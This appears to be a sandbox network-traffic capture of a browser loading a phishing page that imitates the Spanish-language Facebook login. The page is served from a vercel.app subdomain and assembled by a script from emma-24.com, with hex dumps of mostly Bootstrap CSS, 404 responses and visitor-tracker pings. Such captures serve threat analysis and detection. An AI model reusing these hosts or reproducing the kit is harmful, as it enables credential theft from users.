                          2025-01-14 23:42:32 UTC894INData Raw: 31 30 30 30 30 0d 0a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 20 3d 20 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 6c 65 74 20 68 65 61 64 3d 60 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 20 20 20 20 20 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2e 2f 46 61 63 65 62 6f 6f 6b 20 2d 20 49 6e 69 63 69 61 20 73 65 73 69 c3 b3 6e 20 6f 20 72 65 67 c3 ad 73 74 72 61 74 65 5f 66 69 6c 65 73 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63
                          Data Ascii: 10000window.location.hash = Math.random();let head=`<head> <meta charset="UTF-8"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> l="shortcut icon" href="./Facebook - Inicia sesin o regstrate_files/img/favicon.ic
                          2025-01-14 23:42:32 UTC14994INData Raw: 6f 75 63 68 2d 61 63 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 0a 09 2d 6d 6f 7a 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 0a 09 2d 6d 73 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 0a 09 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 0a 7d 0a 0a 2e 61 6c 65 72 74 20 2a 3a 66 6f 63 75 73 20 7b 0a 09 6f 75 74 6c 69 6e 65 3a 20 30 0a 7d 0a 0a 2e 61 6c 65 72 74 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0a 09 74 6f 70 3a 20 35 30 25 3b 0a 09 6c 65 66 74 3a 20 35 30 25 3b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 33 35 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 30 70 78 3b 0a 09 77 69 64 74 68 3a 20 32 37 30 70
                          Data Ascii: ouch-action: none;-webkit-user-select: none;-moz-user-select: none;-ms-user-select: none;user-select: none;}.alert *:focus {outline: 0}.alert {position: fixed;top: 50%;left: 50%;margin-left: -135px;margin-top: -50px;width: 270p
                          2025-01-14 23:42:32 UTC16384INData Raw: 3a 31 30 7d 2e 6f 72 64 65 72 2d 73 6d 2d 31 31 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 31 3b 6f 72 64 65 72 3a 31 31 7d 2e 6f 72 64 65 72 2d 73 6d 2d 31 32 7b 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 31 32 3b 6f 72 64 65 72 3a 31 32 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 30 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 31 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 32 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 36 2e 36 36 36 36 36 37 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 33 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 32 35 25 7d 2e 6f 66 66 73 65 74 2d 73 6d 2d 34 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 33 2e 33 33 33 33 33 33 25 7d 2e 6f 66 66 73 65 74 2d
                          Data Ascii: :10}.order-sm-11{-ms-flex-order:11;order:11}.order-sm-12{-ms-flex-order:12;order:12}.offset-sm-0{margin-left:0}.offset-sm-1{margin-left:8.333333%}.offset-sm-2{margin-left:16.666667%}.offset-sm-3{margin-left:25%}.offset-sm-4{margin-left:33.333333%}.offset-
                          2025-01-14 23:42:32 UTC16384INData Raw: 34 36 2d 31 2e 34 20 31 2e 31 2d 2e 38 6c 31 2e 31 20 31 2e 34 20 33 2e 34 2d 33 2e 38 63 2e 36 2d 2e 36 33 20 31 2e 36 2d 2e 32 37 20 31 2e 32 2e 37 6c 2d 34 20 34 2e 36 63 2d 2e 34 33 2e 35 2d 2e 38 2e 34 2d 31 2e 31 2e 31 7a 27 2f 25 33 65 25 33 63 2f 73 76 67 25 33 65 22 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 72 69 67 68 74 20 63 61 6c 63 28 2e 33 37 35 65 6d 20 2b 20 2e 31 38 37 35 72 65 6d 29 20 63 65 6e 74 65 72 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 61 6c 63 28 2e 37 35 65 6d 20 2b 20 2e 33 37 35 72 65 6d 29 20 63 61 6c 63 28 2e 37 35 65 6d 20 2b 20 2e 33 37 35 72 65 6d 29 7d 2e 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 2e 69 73
                          Data Ascii: 46-1.4 1.1-.8l1.1 1.4 3.4-3.8c.6-.63 1.6-.27 1.2.7l-4 4.6c-.43.5-.8.4-1.1.1z'/%3e%3c/svg%3e");background-repeat:no-repeat;background-position:right calc(.375em + .1875rem) center;background-size:calc(.75em + .375rem) calc(.75em + .375rem)}.form-control.is
                          2025-01-14 23:42:32 UTC16384INData Raw: 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 38 61 37 34 35 7d 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 73 75 63 63 65 73 73 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 38 61 37 34 35 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 32 38 61 37 34 35 7d 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 73 75 63 63 65 73 73 2e 66 6f 63 75 73 2c 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 73 75 63 63 65 73 73 3a 66 6f 63 75 73 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 72 65 6d 20 72 67 62 61 28 34 30 2c 31 36 37 2c 36 39 2c 2e 35 29 7d 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 73 75 63 63 65 73 73 2e 64 69 73 61 62 6c 65 64 2c 2e 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 73 75 63 63 65 73 73 3a 64 69 73 61 62
                          Data Ascii: rder-color:#28a745}.btn-outline-success:hover{color:#fff;background-color:#28a745;border-color:#28a745}.btn-outline-success.focus,.btn-outline-success:focus{box-shadow:0 0 0 .2rem rgba(40,167,69,.5)}.btn-outline-success.disabled,.btn-outline-success:disab
                          2025-01-14 23:42:32 UTC16384INData Raw: 75 73 7e 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 3a 3a 62 65 66 6f 72 65 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 30 20 30 20 2e 32 72 65 6d 20 72 67 62 61 28 30 2c 31 32 33 2c 32 35 35 2c 2e 32 35 29 7d 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 3a 66 6f 63 75 73 3a 6e 6f 74 28 3a 63 68 65 63 6b 65 64 29 7e 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 3a 3a 62 65 66 6f 72 65 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 38 30 62 64 66 66 7d 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 69 6e 70 75 74 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 3a 61 63 74 69 76 65 7e 2e 63 75 73 74 6f 6d 2d 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 3a 3a 62 65 66 6f 72 65 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62
                          Data Ascii: us~.custom-control-label::before{box-shadow:0 0 0 .2rem rgba(0,123,255,.25)}.custom-control-input:focus:not(:checked)~.custom-control-label::before{border-color:#80bdff}.custom-control-input:not(:disabled):active~.custom-control-label::before{color:#fff;b
                          2025-01-14 23:42:32 UTC16384INData Raw: 67 2c 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 3e 2e 63 6f 6e 74 61 69 6e 65 72 2d 6d 64 2c 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 3e 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 2c 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 3e 2e 63 6f 6e 74 61 69 6e 65 72 2d 78 6c 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 7d 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 20 2e 6e 61 76 62 61 72 2d 6e 61 76 7b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 7d 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 20 2e 6e 61 76 62 61 72 2d 6e 61 76 20 2e 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 7d 2e 6e 61 76 62 61
                          Data Ascii: g,.navbar-expand>.container-md,.navbar-expand>.container-sm,.navbar-expand>.container-xl{padding-right:0;padding-left:0}.navbar-expand .navbar-nav{-ms-flex-direction:row;flex-direction:row}.navbar-expand .navbar-nav .dropdown-menu{position:absolute}.navba
                          2025-01-14 23:42:32 UTC16384INData Raw: 66 74 2d 72 61 64 69 75 73 3a 30 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2d 6d 64 20 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2e 61 63 74 69 76 65 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2d 6d 64 20 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2b 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 31 70 78 3b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 77 69 64 74 68 3a 30 7d 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 68 6f 72 69 7a 6f 6e 74 61 6c 2d 6d 64 20 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2b 2e 6c 69 73 74 2d 67 72 6f 75 70 2d 69 74 65 6d 2e 61 63 74 69 76 65 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a
                          Data Ascii: ft-radius:0}.list-group-horizontal-md .list-group-item.active{margin-top:0}.list-group-horizontal-md .list-group-item+.list-group-item{border-top-width:1px;border-left-width:0}.list-group-horizontal-md .list-group-item+.list-group-item.active{margin-left:
                          2025-01-14 23:42:32 UTC16384INData Raw: 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 2c 25 33 63 73 76 67 20 78 6d 6c 6e 73 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 27 20 66 69 6c 6c 3d 27 25 32 33 66 66 66 27 20 77 69 64 74 68 3d 27 38 27 20 68 65 69 67 68 74 3d 27 38 27 20 76 69 65 77 42 6f 78 3d 27 30 20 30 20 38 20 38 27 25 33 65 25 33 63 70 61 74 68 20 64 3d 27 4d 35 2e 32 35 20 30 6c 2d 34 20 34 20 34 20 34 20 31 2e 35 2d 31 2e 35 4c 34 2e 32 35 20 34 6c 32 2e 35 2d 32 2e 35 4c 35 2e 32 35 20 30 7a 27 2f 25 33 65 25 33 63 2f 73 76 67 25 33 65 22 29 7d 2e 63 61 72 6f 75 73 65 6c 2d 63 6f 6e 74 72 6f 6c 2d 6e 65 78 74 2d 69 63 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 2c
                          Data Ascii: mage/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' fill='%23fff' width='8' height='8' viewBox='0 0 8 8'%3e%3cpath d='M5.25 0l-4 4 4 4 1.5-1.5L4.25 4l2.5-2.5L5.25 0z'/%3e%3c/svg%3e")}.carousel-control-next-icon{background-image:url("data:image/svg+xml,
                          2025-01-14 23:42:32 UTC16384INData Raw: 72 65 74 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 2d 6d 64 2d 73 74 61 72 74 7b 2d 6d 73 2d 66 6c 65 78 2d 6c 69 6e 65 2d 70 61 63 6b 3a 73 74 61 72 74 21 69 6d 70 6f 72 74 61 6e 74 3b 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 73 74 61 72 74 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 2d 6d 64 2d 65 6e 64 7b 2d 6d 73 2d 66 6c 65 78 2d 6c 69 6e 65 2d 70 61 63 6b 3a 65 6e 64 21 69 6d 70 6f 72 74 61 6e 74 3b 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 3a 66 6c 65 78 2d 65 6e 64 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 61 6c 69 67 6e 2d 63 6f 6e 74 65 6e 74 2d 6d 64 2d 63 65 6e 74 65 72 7b 2d 6d 73 2d 66 6c 65 78 2d 6c 69 6e 65 2d 70 61 63 6b 3a 63 65 6e 74 65 72 21 69 6d 70 6f 72 74
                          Data Ascii: retch!important}.align-content-md-start{-ms-flex-line-pack:start!important;align-content:flex-start!important}.align-content-md-end{-ms-flex-line-pack:end!important;align-content:flex-end!important}.align-content-md-center{-ms-flex-line-pack:center!import


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.649746172.67.8.1414435068C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2025-01-14 23:42:33 UTC657OUTGET /pingjs/?k=3445435454v?&t=~GOOGLE~&x=https://www.google.com/ HTTP/1.1
                          Host: whos.amung.us
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2025-01-14 23:42:33 UTC254INHTTP/1.1 200 OK
                          Date: Tue, 14 Jan 2025 23:42:33 GMT
                          Content-Type: text/javascript;charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          CF-Cache-Status: DYNAMIC
                          Server: cloudflare
                          CF-RAY: 90217bb38c948c1b-EWR
                          alt-svc: h3=":443"; ma=86400
                          2025-01-14 23:42:33 UTC35INData Raw: 31 64 0d 0a 57 41 55 5f 72 5f 28 27 36 27 2c 27 33 34 34 35 34 33 35 34 35 34 76 27 2c 2d 31 29 3b 0d 0a
                          Data Ascii: 1dWAU_r_('6','3445435454v',-1);
                          2025-01-14 23:42:33 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.649745172.67.8.1414435068C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2025-01-14 23:42:33 UTC654OUTGET /pingjs/?k=pe3434gg?&t=~GOOGLE~&x=https://www.google.com/ HTTP/1.1
                          Host: whos.amung.us
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: cross-site
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2025-01-14 23:42:33 UTC254INHTTP/1.1 200 OK
                          Date: Tue, 14 Jan 2025 23:42:33 GMT
                          Content-Type: text/javascript;charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          CF-Cache-Status: DYNAMIC
                          Server: cloudflare
                          CF-RAY: 90217bb378ce19bb-EWR
                          alt-svc: h3=":443"; ma=86400
                          2025-01-14 23:42:33 UTC32INData Raw: 31 61 0d 0a 57 41 55 5f 72 5f 28 27 36 27 2c 27 70 65 33 34 33 34 67 67 27 2c 2d 31 29 3b 0d 0a
                          Data Ascii: 1aWAU_r_('6','pe3434gg',-1);
                          2025-01-14 23:42:33 UTC5INData Raw: 30 0d 0a 0d 0a
                          Data Ascii: 0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          7192.168.2.649743216.198.79.14435068C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2025-01-14 23:42:33 UTC671OUTGET /Facebook%20-%20Inicia%20sesi%C3%B3n%20o%20reg%C3%ADstrate_files/touch.css HTTP/1.1
                          Host: mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: text/css,*/*;q=0.1
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: style
                          Referer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2025-01-14 23:42:33 UTC363INHTTP/1.1 404 Not Found
                          Cache-Control: public, max-age=0, must-revalidate
                          Content-Length: 39
                          Content-Type: text/plain; charset=utf-8
                          Date: Tue, 14 Jan 2025 23:42:33 GMT
                          Server: Vercel
                          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                          X-Vercel-Error: NOT_FOUND
                          X-Vercel-Id: iad1::6lln6-1736898153546-23c56103686a
                          Connection: close
                          2025-01-14 23:42:33 UTC39INData Raw: 54 68 65 20 70 61 67 65 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 0a 0a 4e 4f 54 5f 46 4f 55 4e 44 0a
                          Data Ascii: The page could not be foundNOT_FOUND


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          8192.168.2.649744216.198.79.14435068C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2025-01-14 23:42:33 UTC724OUTGET /Facebook%20-%20Inicia%20sesi%C3%B3n%20o%20reg%C3%ADstrate_files/facebooklogo.png HTTP/1.1
                          Host: mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2025-01-14 23:42:33 UTC363INHTTP/1.1 404 Not Found
                          Cache-Control: public, max-age=0, must-revalidate
                          Content-Length: 39
                          Content-Type: text/plain; charset=utf-8
                          Date: Tue, 14 Jan 2025 23:42:33 GMT
                          Server: Vercel
                          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                          X-Vercel-Error: NOT_FOUND
                          X-Vercel-Id: iad1::f6c5k-1736898153561-936fb51d16df
                          Connection: close
                          2025-01-14 23:42:33 UTC39INData Raw: 54 68 65 20 70 61 67 65 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 0a 0a 4e 4f 54 5f 46 4f 55 4e 44 0a
                          Data Ascii: The page could not be foundNOT_FOUND


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          9192.168.2.649742216.198.79.14435068C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2025-01-14 23:42:33 UTC720OUTGET /Facebook%20-%20Inicia%20sesi%C3%B3n%20o%20reg%C3%ADstrate_files/img_2713.jpg HTTP/1.1
                          Host: mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app
                          Connection: keep-alive
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          sec-ch-ua-platform: "Windows"
                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: no-cors
                          Sec-Fetch-Dest: image
                          Referer: https://mia-s-6m3a-sg5i-com-s4kuqcp9y8.vercel.app/facebook.com.html
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2025-01-14 23:42:33 UTC363INHTTP/1.1 404 Not Found
                          Cache-Control: public, max-age=0, must-revalidate
                          Content-Length: 39
                          Content-Type: text/plain; charset=utf-8
                          Date: Tue, 14 Jan 2025 23:42:33 GMT
                          Server: Vercel
                          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                          X-Vercel-Error: NOT_FOUND
                          X-Vercel-Id: iad1::7vb9r-1736898153577-25c2ae96e09e
                          Connection: close
                          2025-01-14 23:42:33 UTC39INData Raw: 54 68 65 20 70 61 67 65 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 0a 0a 4e 4f 54 5f 46 4f 55 4e 44 0a
                          Data Ascii: The page could not be foundNOT_FOUND


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          10192.168.2.649748172.93.105.34435068C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2025-01-14 23:42:33 UTC363OUTGET /index.php?username=panilover HTTP/1.1
                          Host: emma-24.com
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2025-01-14 23:42:33 UTC474INHTTP/1.1 200 OK
                          Connection: close
                          access-control-allow-origin: *
                          cache-control: no-store, no-cache, must-revalidate, max-age=0
                          cache-control: post-check=0, pre-check=0
                          pragma: no-cache
                          content-type: application/javascript
                          transfer-encoding: chunked
                          date: Tue, 14 Jan 2025 23:42:33 GMT
                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                          2025-01-14 23:42:33 UTC894INData Raw: 31 30 30 30 30 0d 0a 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 20 3d 20 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 6c 65 74 20 68 65 61 64 3d 60 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 20 20 20 20 20 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2e 2f 46 61 63 65 62 6f 6f 6b 20 2d 20 49 6e 69 63 69 61 20 73 65 73 69 c3 b3 6e 20 6f 20 72 65 67 c3 ad 73 74 72 61 74 65 5f 66 69 6c 65 73 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63
                          Data Ascii: 10000window.location.hash = Math.random();let head=`<head> <meta charset="UTF-8"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> l="shortcut icon" href="./Facebook - Inicia sesin o regstrate_files/img/favicon.ic
                          2025-01-14 23:42:33 UTC14994INData Raw: 6f 75 63 68 2d 61 63 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 0a 09 2d 6d 6f 7a 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 0a 09 2d 6d 73 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 0a 09 75 73 65 72 2d 73 65 6c 65 63 74 3a 20 6e 6f 6e 65 3b 0a 7d 0a 0a 2e 61 6c 65 72 74 20 2a 3a 66 6f 63 75 73 20 7b 0a 09 6f 75 74 6c 69 6e 65 3a 20 30 0a 7d 0a 0a 2e 61 6c 65 72 74 20 7b 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0a 09 74 6f 70 3a 20 35 30 25 3b 0a 09 6c 65 66 74 3a 20 35 30 25 3b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 33 35 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 35 30 70 78 3b 0a 09 77 69 64 74 68 3a 20 32 37 30 70
                          Data Ascii: ouch-action: none;-webkit-user-select: none;-moz-user-select: none;-ms-user-select: none;user-select: none;}.alert *:focus {outline: 0}.alert {position: fixed;top: 50%;left: 50%;margin-left: -135px;margin-top: -50px;width: 270p
